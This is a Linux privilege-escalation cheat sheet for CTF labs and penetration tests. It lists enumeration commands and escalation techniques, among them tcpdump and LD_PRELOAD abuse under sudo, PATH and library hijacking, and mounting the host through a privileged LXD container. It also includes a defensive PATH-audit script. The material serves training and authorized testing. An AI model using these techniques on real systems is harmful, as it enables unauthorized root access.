Linux Privilege Escalation Cheat Sheet
When working on Capture the Flag (CTF) labs or penetration tests on Linux, it is essential to gather information about the target system and look for privilege-escalation opportunities. The following commands provide a practical reference for enumeration, misconfiguration discovery, and common privilege-escalation techniques.
Initial Access and User Enumeration

| Command | Description |
|---|---|
| `ssh htb-student@<target IP>` | SSH into the target machine using the htb-student account. |
| `ps aux \| grep root` | List running processes and filter for those owned by root. |
| `ps au` | List processes attached to a terminal, which reveals the currently logged-in users. |
| `ls /home` | View all user home directories. |
| `ls -l ~/.ssh` | Check for SSH keys belonging to the current user. |
| `history` | Show the current user's shell history. |
| `sudo -l` | List the commands the current user may run through sudo, and as which user. |
Cron Jobs and File Systems

| Command | Description |
|---|---|
| `ls -la /etc/cron.daily` | Inspect daily Cron jobs for potential privilege-escalation scripts. |
| `lsblk` | List block devices to find unmounted file systems or hidden drives. |
| `find / -path /proc -prune -o -type d -perm -o+w -print 2>/dev/null` | Find world-writable directories (the explicit `-print` keeps the pruned `/proc` entry itself out of the output). |
| `find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null` | Find world-writable files. |
System and Kernel Information

| Command | Description |
|---|---|
| `uname -a` | Display the kernel version (useful for kernel exploits). |
| `cat /etc/lsb-release` | Show the operating system release details. |
Exploits and Binary Checks

| Command | Description |
|---|---|
| `gcc kernel_exploit.c -o kernel_exploit` | Compile a C-based kernel exploit. |
| `screen -v` | Check the installed version of GNU Screen (older versions may be vulnerable). |
| `./pspy64 -pf -i 1000` | Monitor running processes with pspy. |
| `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null` | Locate root-owned binaries with the SUID bit set. |
| `find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null` | Locate root-owned binaries with the SGID bit set (`-perm -6000` would only match files that have both SUID and SGID set). |
| `sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root` | Exploit tcpdump to escalate privileges. |
| `echo $PATH` | Display the current user's PATH variable. |
| `PATH=.:${PATH}` | Add the current directory to the beginning of PATH. |
| `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null` | Search for configuration files that may contain credentials. |
| `ldd /bin/ls` | List shared objects required by a binary. |
| `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart` | Escalate privileges using the LD_PRELOAD technique. |
| `readelf -d payroll \| grep PATH` | Check the RPATH/RUNPATH of a binary for potential library injection. |
| `gcc src.c -fPIC -shared -o /development/libshared.so` | Compile a shared library for exploitation. |
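The two PATH rows above (`echo $PATH`, `PATH=.:${PATH}`) rely on PATH hijacking: a writable or current-directory entry lets an attacker's binary shadow a legitimate one. As an added example that is not part of the original cheat sheet, the POSIX shell function below audits a PATH string from the defender's side and flags the entries that make this possible; the function name `audit_path` and the sample PATH in the comments are my own.

```shell
#!/bin/sh
# audit_path: flag PATH entries that enable PATH hijacking (constructed example).
# Flags: empty entries (from "::", a leading or trailing ":"), ".", relative paths,
# and absolute directories that are world-writable without the sticky bit.
# Prints one RISK line per finding; returns 1 if anything was flagged, else 0.
audit_path() {
  _rest="$1:"          # trailing ':' so the loop also consumes the last entry
  _findings=0
  while [ -n "$_rest" ]; do
    _entry="${_rest%%:*}"   # text before the first ':'
    _rest="${_rest#*:}"     # drop it together with the ':'
    case "$_entry" in
      "" | .)
        echo "RISK: current-directory entry '${_entry:-<empty>}' (commands resolve from the working directory)"
        _findings=$((_findings + 1)) ;;
      /*)
        # world-writable (o+w) and not sticky: any local user can plant a binary there
        if [ -n "$(find "$_entry" -maxdepth 0 -type d -perm -0002 ! -perm -1000 2>/dev/null)" ]; then
          echo "RISK: world-writable directory '$_entry'"
          _findings=$((_findings + 1))
        fi ;;
      *)
        echo "RISK: relative entry '$_entry' (resolved against the working directory)"
        _findings=$((_findings + 1)) ;;
    esac
  done
  [ "$_findings" -eq 0 ]
}

# Usage: audit_path "$PATH"  (e.g. "/usr/bin:.::/tmp/build:opt/tools" yields three RISK lines
# plus one more if /tmp/build is world-writable without the sticky bit)
```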
LXD and Container Techniques

| Command | Description |
|---|---|
| `lxd init` | Start the LXD initialization process. |
| `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine` | Import a local Alpine Linux image (metadata tarball plus rootfs tarball) into LXD. |
| `lxc init alpine r00t -c security.privileged=true` | Create a privileged LXD container named r00t (it is not started yet). |
| `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true` | Mount the host file system inside the container. |
| `lxc start r00t` | Start the LXD container. |
Network and Remote Resources

| Command | Description |
|---|---|
| `showmount -e 10.129.2.12` | Display the NFS export list of a remote host. |
| `sudo mount -t nfs 10.129.2.12:/tmp /mnt` | Mount an NFS share locally. |
| `tmux -S /shareds new -s debugsess` | Create a tmux session on a shared socket. |
| `./lynis audit system` | Perform a system audit with Lynis. |
Notes

- Many of these commands require elevated privileges or specific system conditions to be effective.
- Always verify permissions, ownerships, and kernel versions before attempting an exploit.
- Use these commands responsibly and only on systems you are authorized to test.
This post is licensed under CC BY 4.0 by the author.